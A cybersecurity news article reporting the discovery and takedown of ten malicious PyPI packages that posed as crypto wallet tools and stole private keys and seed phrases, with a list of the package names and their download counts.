Skip to content

PyPi repository infected with crypto-stealing malware

  • by
  • 2 min read

Security researchers have discovered as many as ten malicious packages on the Python Package Index (PyPI) repository. The packages pretended to be legitimate tools for decoding and managing data from multiple popular crypto wallets but were stealing sensitive data from their users. The ten packages have over 3,500 downloads between them.

The attack targeted users of Atomic, Trust Wallet, Metamask, Ronin, TronLink, Exodus, and other popular crypto wallets. The packages promised functionality for crypto users engaged in wallet recovery and management. Still, they would steal sensitive crypto wallet data like private keys and mnemonic phrases behind the scenes, potentially gaining access to the victims’ funds.

The researchers identified that these packages were published on September 22 to the PyPI repository, a popular place for developers to quickly get extensions that enable specific functionality without writing tons of extra code. The packages distributed their source code across dependencies, separating the main package from the more harmful data-stealing components. They would activate only when specific functions were called to evade detection.

The attack flow of the malicious extensions. | Source: Checkmarx

The attack chain also differs from the usual modus operandi in such cases. Instead of triggering the malicious packages automatically on installation, the packages only fetch another Python package containing the malicious code. They then lay dormant until a specific function is called, upon which they fetch malicious Python code from a Pastebin link and extract sensitive wallet information to the attacker’s server.

PyPI has taken down the malicious packages, but by then, they had amassed a total of 3,782 downloads. A full list with the number of downloads is as follows.

Package nameNumber of downloads
atomicdecoderss 366 downloads
trondecoderss 240 downloads
phantomdecoderss 449 downloads
trustdecoderss 466 downloads
exodusdecoderss 422 downloads
walletdecoderss 232 downloads
ccl-localstoragerss 335 downloads
exodushcates 415 downloads
cipherbcryptors 450 downloads
ccl_leveldbases (407 downloads)

To further obfuscate code and hide their identity, the attacker did not hardcode the address of their command and control server in any of the packages, instead using a PasteBin link to deliver the malicious code. This made code analysis difficult and allowed attackers to change or update the malicious code without having to update the malicious repositories themselves.

In the News: Arrested UK national hacked executives’ emails to engage in hack-and-trade

Yadullah Abidi

Yadullah Abidi

Yadullah is a Computer Science graduate who writes/edits/shoots/codes all things cybersecurity, gaming, and tech hardware. When he's not, he streams himself racing virtual cars. He's been writing and reporting on tech and cybersecurity with websites like Candid.Technology and MakeUseOf since 2018. You can contact him here: yadullahabidi@pm.me.

>